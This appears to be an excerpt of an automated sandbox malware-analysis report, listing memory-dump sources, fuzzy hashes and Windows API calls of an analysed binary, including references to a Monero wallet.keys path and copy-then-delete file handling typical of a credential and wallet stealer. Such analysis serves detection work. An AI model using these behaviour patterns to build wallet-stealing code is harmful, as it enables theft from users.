                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 8ff2283d6a356099ef3d698f3f61e3761cf72fdec8f13c21996f5dfe47cd21f2
                            • Instruction ID: 4aa52ebf4d5e7b488b4c40bdd634cca039b1bd31345ebe9219039147a0c61342
                            • Opcode Fuzzy Hash: 8ff2283d6a356099ef3d698f3f61e3761cf72fdec8f13c21996f5dfe47cd21f2
                            • Instruction Fuzzy Hash: 2B01167550060CFFCB15DFECE988EAE7BB9EB48350F108148F9098B240C731AA41DB91
                            Function 000E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000E12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000E12F5
                            • RegCloseKey.ADVAPI32(?), ref: 000E12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: c1b64b4e0fade9f136a575140635e07850b513c6f34082d8bebce5c3fd3250d1
                            • Instruction ID: d370883152e7f3b95165360f548de9d974c764796c30a95081c02a5a09bbf33e
                            • Opcode Fuzzy Hash: c1b64b4e0fade9f136a575140635e07850b513c6f34082d8bebce5c3fd3250d1
                            • Instruction Fuzzy Hash: A101CDB9A40208BBDB15DFE4DC49FAEBBBCEB48701F108159FA05A7280D6759A028B51
                            Function 000FC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: bd999dbd967b09b5db5801b4ac08fd7c569eb07b744d06a68063af82b9218e78
                            • Instruction ID: cef9557fbd2cbbced9f1506673c285c43a9a90416ab5dd207621bd0b24cd541e
                            • Opcode Fuzzy Hash: bd999dbd967b09b5db5801b4ac08fd7c569eb07b744d06a68063af82b9218e78
                            • Instruction Fuzzy Hash: BF41F8B110475C5EEB318B24CD89FFB7BE99F45704F1444E8EACA86582D2B19A45AF20
                            Function 000F6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000F6663
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000F6726
                            • ExitProcess.KERNEL32 ref: 000F6755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: f1e0ef426ff5ca6ff21ef0d110b2e3e17b2cb4e9b63426b525aac437a320c86a
                            • Instruction ID: 27959a56086f2e60f54f83dd8b9f61447d5a4a8d188ec35c02a8146fe5598b9e
                            • Opcode Fuzzy Hash: f1e0ef426ff5ca6ff21ef0d110b2e3e17b2cb4e9b63426b525aac437a320c86a
                            • Instruction Fuzzy Hash: F1311CF1901218ABDB15EB90DC91BEE777CAF44300F404199F30966192DFB46B49DF6A
                            Function 000F87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00100E28,00000000,?), ref: 000F882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F8836
                            • wsprintfA.USER32 ref: 000F8850
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: c26caa469944aa77c31a2a93606396a828231c4e5ff897ced0058184f4f97305
                            • Instruction ID: b39f0e99596ae03c8788c7c05878b1c2d6dd6573b9f6f0568d687f5a6dd6c92c
                            • Opcode Fuzzy Hash: c26caa469944aa77c31a2a93606396a828231c4e5ff897ced0058184f4f97305
                            • Instruction Fuzzy Hash: 85213DB1A40608AFDB15DFD8DD49FAEBBB8FB48701F10411DF605A7680C779A9018BA1
                            Function 000F8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000F951E,00000000), ref: 000F8D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F8D62
                            • wsprintfW.USER32 ref: 000F8D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 50e0b75f7a09a83e15fc4bd1065963a5143931bd147e3a58349ec10e389a3c55
                            • Instruction ID: 31c12ffb27c43f089a939f454cc07d5a480652c36fbdc5808b876356572a277e
                            • Opcode Fuzzy Hash: 50e0b75f7a09a83e15fc4bd1065963a5143931bd147e3a58349ec10e389a3c55
                            • Instruction Fuzzy Hash: 1BE0C2B0A40208FFD720DFD4DC0AE6D7BBCEB08702F004098FE0987280DA719E018B96
                            Function 000EA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F8B60: GetSystemTime.KERNEL32(00100E1A,0122A2A0,001005AE,?,?,000E13F9,?,0000001A,00100E1A,00000000,?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000F8B86
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000EA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 000EA3FF
                            • lstrlen.KERNEL32(00000000), ref: 000EA6BC
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 000EA743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 2e2def6d072002cf2a0a2eb3bbafc657a5d57dff0a134dc3a0f26f9e9a883001
                            • Instruction ID: 49ffc960791d6e56231ddfab48a8826486d6fb5164ada997289e0b033a02da7d
                            • Opcode Fuzzy Hash: 2e2def6d072002cf2a0a2eb3bbafc657a5d57dff0a134dc3a0f26f9e9a883001
                            • Instruction Fuzzy Hash: 2DE1F1B291010C9BCB15EBA4DC91EFE733CAF55340F508169F61A72492EF746A0EDB62
                            Function 000ED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F8B60: GetSystemTime.KERNEL32(00100E1A,0122A2A0,001005AE,?,?,000E13F9,?,0000001A,00100E1A,00000000,?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000F8B86
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000ED481
                            • lstrlen.KERNEL32(00000000), ref: 000ED698
                            • lstrlen.KERNEL32(00000000), ref: 000ED6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 000ED72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: cdf6c38092b627e24693bb064cda358d6ac0da55d882527f90f8845ac5836b98
                            • Instruction ID: 18b636e079e8c65a8d7255548b13c1577984ef943803b77f37a8e11d95317556
                            • Opcode Fuzzy Hash: cdf6c38092b627e24693bb064cda358d6ac0da55d882527f90f8845ac5836b98
                            • Instruction Fuzzy Hash: 7591F3B1A1010C9BCB15FBA4DC51DFE7338AF55340F508169F60AA6492EF746A0EDB62
                            Function 000ED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000F8B60: GetSystemTime.KERNEL32(00100E1A,0122A2A0,001005AE,?,?,000E13F9,?,0000001A,00100E1A,00000000,?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000F8B86
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000ED801
                            • lstrlen.KERNEL32(00000000), ref: 000ED99F
                            • lstrlen.KERNEL32(00000000), ref: 000ED9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 000EDA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 817d299f2ecaf3e6c0a43ed064998cae9a150ae1769cb7114b04d64a6b70d849
                            • Instruction ID: 942f0bbde9ee5e1ee8afb3f6f03c169c03f5284d4ec69077648b439604ff5376
                            • Opcode Fuzzy Hash: 817d299f2ecaf3e6c0a43ed064998cae9a150ae1769cb7114b04d64a6b70d849
                            • Instruction Fuzzy Hash: E681F1B2A1010C9BCB15FBA4DC56DFE7338AF55340F404529F60AA6493EF746A0EDB62
                            Function 000EF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000E99EC
                              • Part of subcall function 000E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000E9A11
                              • Part of subcall function 000E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000E9A31
                              • Part of subcall function 000E99C0: ReadFile.KERNEL32(000000FF,?,00000000,000E148F,00000000), ref: 000E9A5A
                              • Part of subcall function 000E99C0: LocalFree.KERNEL32(000E148F), ref: 000E9A90
                              • Part of subcall function 000E99C0: CloseHandle.KERNEL32(000000FF), ref: 000E9A9A
                              • Part of subcall function 000F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000F8E52
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                              • Part of subcall function 000FA920: lstrcpy.KERNEL32(00000000,?), ref: 000FA972
                              • Part of subcall function 000FA920: lstrcat.KERNEL32(00000000), ref: 000FA982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00101580,00100D92), ref: 000EF54C
                            • lstrlen.KERNEL32(00000000), ref: 000EF56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
